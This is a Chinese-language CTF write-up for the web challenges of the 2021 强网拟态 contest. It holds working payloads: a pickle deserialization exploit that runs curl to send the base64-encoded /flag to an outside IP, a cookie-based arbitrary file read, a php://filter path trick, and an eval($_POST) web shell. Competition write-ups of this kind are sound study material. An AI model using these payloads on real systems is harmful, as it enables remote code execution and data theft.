2021_强网拟态_WP

兄弟姐妹们太棒了,我愿称你们为最强~恭喜 xp xd ~

在这里记录一下 Web 题的题解叭。

zerocalc

这题是签到 js,本来以为挺复杂的,就让队友去看了,结果队友也想偏了,第二天我看的时候随便试了一下 readFile(‘/flag’),然后就挺意外的。。。

ezPickle

题目给了源码:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
from flask import Flask, request, session, render_template_string, url_for,redirect
import pickle
import io
import sys
import base64
import random
import subprocess
from config import notadmin

app = Flask(__name__)

class RestrictedUnpickler(pickle.Unpickler):
def find_class(self, module, name):
if module in ['config'] and "__" not in name:
return getattr(sys.modules[module], name)
raise pickle.UnpicklingError("'%s.%s' not allowed" % (module, name))


def restricted_loads(s):
"""Helper function analogous to pickle.loads()."""
return RestrictedUnpickler(io.BytesIO(s)).load()

@app.route('/')
def index():
info = request.args.get('name', '')
if info is not '':
x = base64.b64decode(info)
User = restricted_loads(x)
return render_template_string('Hello')


if __name__ == '__main__':
app.run(host='0.0.0.0', debug=True, port=5000)

pickle 反序列化,不过给限定了 module in [‘config’] 和 ‘__’,然后看看 config.py

1
2
3
4
5
6
notadmin={"admin":"no"}

def backdoor(cmd):
if notadmin["admin"]=="yes":
s=''.join(cmd )
eval(s)

可以尝试利用 c & s 操作码进行全局变量覆盖,将 notadmin 中的 admin 修改为 yes 执行 eval

1
2
3
4
5
6
data = b"""cconfig
notadmin
S"admin"
S"yes"
s0
"""

然后直接用 curl 把 flag 带出来

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
# 还是🍋骚
import base64
import httpx as requests
session = requests.Client(base_url="http://124.71.183.254:32770/", timeout=2)
data = b"""cconfig
notadmin
S"admin"
S"yes"
s0(S"__import__('os').system('curl http://106.15.90.116:11451/?fuxk-$(cat /flag | base64)')"
iconfig
backdoor
.
"""
session.get("/", params={
"name": base64.b64encode(data).decode()
})

这里利用到了 i 操作码

相当于c和o的组合,先获取一个全局函数,然后寻找栈中的上一个MARK,并组合之间的数据为元组,以该元组为参数执行全局函数(或实例化一个对象)

Jack-Shiro

原题。。。当时打过比赛的,就不写了,from 天翼杯2021 的 jackson

new_hospital

这题本来早就出了,我傻逼了。。。

就是访问 feature.php?id=2 发现了 Cookie 中存在 API,base64 解码后发现是我们传入的值拼接 .js,同时发现 /old/feature.php 中存在任意文件读取,修改 Cookie 中的 API 即可任意文件读取,读取 flag.php 即可。

1
2
3
4
5
6
import requests

cookie = {"API": "L3Zhci93d3cvaHRtbC9mbGFnLnBocA%3D%3D"}
conn = requests.get("http://123.60.75.243:32766/old/feature.php", cookies=cookie)

print(conn.text)

EasyFilter

题目给出了源码

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
<?php
ini_set("open_basedir","./");
if(!isset($_GET['action'])){
highlight_file(__FILE__);
die();
}
if($_GET['action'] == 'w'){
@mkdir("./files/");
$content = $_GET['c'];
$file = bin2hex(random_bytes(5));
file_put_contents("./files/".$file,base64_encode($content));
echo "./files/".$file;
}elseif($_GET['action'] == 'r'){
$r = $_GET['r'];
$file = "./files/".$r;
include("php://filter/resource=$file");
}

谭总教的 fuzz 一下,第一天没 fuzz 出来,第二天随便试了一下出了,人傻了……

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
<?php
set_error_handler(function($errno, $errstr, $errfile, $errline, array $errcontext) {
if (0 === error_reporting()) {
return false;
}
throw new ErrorException($errstr, 0, $errno, $errfile, $errline);
});
$test = "";
for ($i = 0; $i < 128; $i++) {
$test = chr($i);
try {
include "php://filter/resource=123${test}123/resource=a.txt";
} catch (Throwable $e) {
echo $i." ".$test." ".$e->getMessage()."\n";
}
}

发现了 @ 字符有点骚

1
2
3
4
5
6
7
8
9
60         <     include(php://filter/resource=123<123/resource=a.txt): failed to open stream: operation failed
61 = include(php://filter/resource=123=123/resource=a.txt): failed to open stream: operation failed
62 > include(php://filter/resource=123>123/resource=a.txt): failed to open stream: operation failed
63 ? include(php://filter/resource=123?123/resource=a.txt): failed to open stream: operation failed
64 @ include(php://...@123/resource=a.txt): failed to open stream: operation failed
65 A include(php://filter/resource=123A123/resource=a.txt): failed to open stream: operation failed
66 B include(php://filter/resource=123B123/resource=a.txt): failed to open stream: operation failed
67 C include(php://filter/resource=123C123/resource=a.txt): failed to open stream: operation failed
68 D include(php://filter/resource=123D123/resource=a.txt): failed to open stream: operation failed

可以尝试发送 @/../../../index.php 构造出 php://filter/resource=./files/@/../../../index.php 成功读取 index.php,所以可以尝试包含一下 files 下的文件,我们先传入一个包含了 <?php phpinfo();?> 的文件,然后尝试构造 convert.base64-decode/resource@/../../../files/34699711a2 ,成功包含:

1
?action=w&c=<?php%20phpinfo();?>

所以我们可以直接传入一个一句话木马:

1
2
3
?action=w&c=<?php%20eval($_POST[1]);?>
POST
1=?><?=`cat /flag`;

Give_me_your_0day

简单的 rogue_mysql,抓包改一下数据库类型,就把 flag 带出来就完事了……

PS:

🍋说看到我这个 。。。 的写法说受不住,舒服了